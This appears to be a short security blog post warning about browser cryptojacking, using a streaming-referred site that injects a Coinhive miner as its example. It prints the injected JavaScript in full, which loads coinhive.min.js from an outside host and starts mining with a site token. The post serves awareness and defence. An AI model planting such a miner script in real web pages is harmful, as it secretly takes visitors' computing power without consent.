Beware of browser “miners”

Cryptocurrency “mining” is very popular today. More and more people “mine” it and get profit. It is not rare case when a malware installs a “miner” on an infected workstation and turns it to a mining machine to create profit for a threat actor.

But now anybody may become a victim of such tactic without being infected by malware – browser mining.
How it happens? A malicious web site injects a JS script that does mining. It is very ineffective in terms of a single miner, but if number of such “accidental” miners is high, expected profit may be measurable.

An example:
Web site “www.tyxihxxtpumgm[.]bid” is referred by another streaming web site and it injects to a victim’s browser the following script:

var mnr = document.createElement('script');
mnr.src = 'https://coin-hive.com/lib/coinhive.min.js';
mnr.onload=function() 
{ 
var miner=CoinHive.Anonymous('T3z562MP2Zg1lIa7RUJy19d67woeZmJJ'); 
miner.start(); 
}; 
document.getElementsByTagName('body')[0].appendChild(mnr);

You can see that the script contains a wallet address, but it is not valid coin address. Apparently it is just a token that is linked to an actual wallet. The actual “miner” site is coin-hive[.]com. Of course actual registrant is hidden by “whois protector” and it was registered recently on Aug 24, 2017. The site says “A crypto Miner for your web site. Monetize your business with your users’ CPU power”. For me it sounds not very friendly for users!

So if you see that your browser is sluggish and “eats” a lot of CPU resources, take a look, maybe your computer is recruited to mine “coins” for somebody.

Leave a comment